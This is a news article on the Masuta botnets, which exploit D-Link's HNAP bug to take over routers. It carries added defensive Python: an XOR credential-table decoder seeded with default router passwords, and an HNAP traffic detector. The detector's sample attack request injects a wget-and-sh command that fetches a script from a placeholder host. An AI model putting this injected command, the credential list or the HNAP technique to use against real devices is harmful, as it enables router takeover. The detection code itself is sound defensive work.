
Fresh botnet recruiting routers with weak credentials

With a special HNAP exploit just for D-Link kit

By Richard Chirgwin


Security researchers believe the author of the Satori botnet is at it again, this time attacking routers to craft a botnet dubbed "Masuta".

The early-January Satori botnet exploited a Huawei router zero-day; Masuta likewise goes after routers.

According to NewSky's analysis, the attack comes in two flavours. There's Masuta, which takes the standard IoT approach of scanning for devices that still use default credentials (its credential list is obfuscated with a single-byte XOR by 0x22, a trick borrowed from Mirai); and there's the more sophisticated "PureMasuta", which exploits an old bug in a router administration protocol.
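The XOR obfuscation is worth seeing in practice, because it is the first thing an analyst strips off a fresh sample. The following is an added example, not NewSky's code or anything from the Masuta binary: it builds a constructed credential table, obfuscates it with the 0x22 key the article reports, decodes it, and also brute-forces the key as one would for a sample whose key is unknown. The table layout (colon-separated "user:pass" entries terminated by NUL bytes) and the credential pairs are assumptions for the example.

```python
import re

KEY = 0x22  # the single-byte XOR key the article reports for Masuta's credential list


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; the same call both obfuscates and recovers."""
    return bytes(b ^ key for b in data)


# Constructed sample (not Masuta's real table): default "user:pass" pairs joined
# by NUL bytes, then obfuscated as the article describes.  The colon-separated,
# NUL-terminated layout is an assumption made for this example.
PLAIN_CREDS = [b"root:xc3511", b"admin:admin", b"support:support", b"user:user"]
OBFUSCATED_BLOB = xor_bytes(b"\x00".join(PLAIN_CREDS) + b"\x00", KEY)

# What a decoded entry is expected to look like under the assumed layout.
CRED_RE = re.compile(rb"^[a-z0-9_]+:[a-z0-9_]*$")


def decode_table(blob: bytes, key: int = KEY) -> list[tuple[str, str]]:
    """Recover (username, password) tuples from an XOR-obfuscated credential blob."""
    pairs = []
    for entry in xor_bytes(blob, key).split(b"\x00"):
        if not entry:  # trailing terminator
            continue
        user, _, pw = entry.partition(b":")
        pairs.append((user.decode("ascii", "replace"), pw.decode("ascii", "replace")))
    return pairs


def guess_single_byte_key(blob: bytes) -> int:
    """Brute-force the 256 candidate keys for a sample whose key is unknown.

    Each key is scored by how many decoded entries look like a user:pass pair.
    Scoring on plain "printable ASCII" is not enough here: XORing lowercase
    letters with 0x22 still yields printable bytes, so several wrong keys look
    plausible.  Only the true key turns the separator back into NUL and the
    ':' back into a colon, so it is the only one that scores above zero.
    """
    def score(k: int) -> int:
        return sum(1 for e in xor_bytes(blob, k).split(b"\x00") if CRED_RE.match(e))
    return max(range(256), key=score)


if __name__ == "__main__":
    k = guess_single_byte_key(OBFUSCATED_BLOB)
    print(f"recovered key: 0x{k:02x}")
    for user, pw in decode_table(OBFUSCATED_BLOB, k):
        print(f"{user}:{pw}")
```

The brute-force step is the transferable part: for a real sample, dump the obfuscated table from the binary, and the scoring function only needs its pattern adjusted to whatever layout the table actually uses.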

That bug dates back to 2015, when Craig Heffner found it in D-Link's Home Network Administration Protocol (HNAP). It's the bug PureMasuta tries to exploit.

NewSky wrote:

It is possible to craft a SOAP query which can bypass authentication by using hxxp://purenetworks.com/HNAP1/GetDeviceSettings. Also, it is feasible to run system commands (leading to arbitrary code execution) because of improper string handling. When both issues are combined, one can form a SOAP request which first bypasses authentication, and then causes arbitrary code execution.

Because the bug lets an unauthenticated attacker make the router run arbitrary commands via GetDeviceSettings, PureMasuta's bot-herders use it to invoke wget, which fetches a shell script that is then executed, recruiting the device into their botnet.
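For anyone watching traffic in front of such routers, the two traits above (an HNAP request invoking GetDeviceSettings, and a wget-and-run payload riding on it) are enough to write a first-pass detector. The following is an added example, not NewSky's or D-Link's code and not a working exploit: it parses raw HTTP requests and flags HNAP1 requests that combine the GetDeviceSettings action with shell-command indicators. Both sample requests are constructed; the malicious one uses a reserved .invalid domain, and the position of the injected command (the SOAPAction header) is an assumption, which is why the detector checks the header and the body alike.

```python
import re
from dataclasses import dataclass, field

# Indicators taken from the article: the GetDeviceSettings action that gets a
# request past authentication, and the wget-and-run payload PureMasuta delivers.
AUTH_BYPASS_ACTION = b"purenetworks.com/HNAP1/GetDeviceSettings"
SHELL_INDICATORS = re.compile(rb"`|\$\(|\|\||&&|\bwget\b|\bcurl\b|\btftp\b|/tmp/")


@dataclass
class Verdict:
    suspicious: bool
    reasons: list[str] = field(default_factory=list)


def parse_http_request(raw: bytes):
    """Minimal HTTP/1.x request parser: (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split()
    method = parts[0] if parts else b""
    path = parts[1] if len(parts) > 1 else b""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")  # first colon only; values may hold URLs
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_hnap_request(raw: bytes) -> Verdict:
    """Flag HNAP1 requests that pair GetDeviceSettings with shell-command indicators.

    GetDeviceSettings on its own is how legitimate HNAP clients discover a device,
    so it is recorded as a reason but does not by itself make the verdict
    suspicious; the shell indicators do.
    """
    method, path, headers, body = parse_http_request(raw)
    if not path.startswith(b"/HNAP1"):
        return Verdict(False)
    reasons = []
    action = headers.get(b"soapaction", b"")
    if AUTH_BYPASS_ACTION in action or AUTH_BYPASS_ACTION in body:
        reasons.append("GetDeviceSettings action (reaches the router unauthenticated)")
    for where, data in (("SOAPAction header", action), ("body", body)):
        m = SHELL_INDICATORS.search(data)
        if m:
            reasons.append(f"shell indicator {m.group(0)!r} in {where}")
    return Verdict(any(r.startswith("shell indicator") for r in reasons), reasons)


# Constructed samples for this example (not captured traffic).
BENIGN_REQUEST = (
    b"POST /HNAP1/ HTTP/1.1\r\n"
    b"Host: 192.168.0.1\r\n"
    b'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"\r\n'
    b"Content-Type: text/xml; charset=utf-8\r\n"
    b"\r\n"
    b'<?xml version="1.0" encoding="utf-8"?>'
    b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    b'<GetDeviceSettings xmlns="http://purenetworks.com/HNAP1/"/></soap:Body></soap:Envelope>'
)

MALICIOUS_REQUEST = (
    b"POST /HNAP1/ HTTP/1.1\r\n"
    b"Host: 192.168.0.1\r\n"
    b'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/'
    b"`wget http://example.invalid/m.sh -O /tmp/m.sh && sh /tmp/m.sh`\"\r\n"
    b"Content-Type: text/xml; charset=utf-8\r\n"
    b"\r\n"
    b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    b'<GetDeviceSettings xmlns="http://purenetworks.com/HNAP1/"/></soap:Body></soap:Envelope>'
)

if __name__ == "__main__":
    for name, req in (("benign", BENIGN_REQUEST), ("malicious", MALICIOUS_REQUEST)):
        v = inspect_hnap_request(req)
        print(f"{name}: suspicious={v.suspicious}")
        for r in v.reasons:
            print(f"  - {r}")
```

The indicator list is deliberately narrow (fetch tools, command substitution, chaining operators, /tmp paths) so that ordinary XML bodies do not trip it; widen it only after checking what legitimate HNAP clients on the network actually send.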

If you have a vulnerable device – D-Link's AC300, for example – make sure you're running firmware released after the 2015 fix.

NewSky's attribution of the botnet to an entity they dub "Nexus Zeta" rests on the C&C domain nexusiotsolutions(dot)net, the same one the Satori botnet used. ®
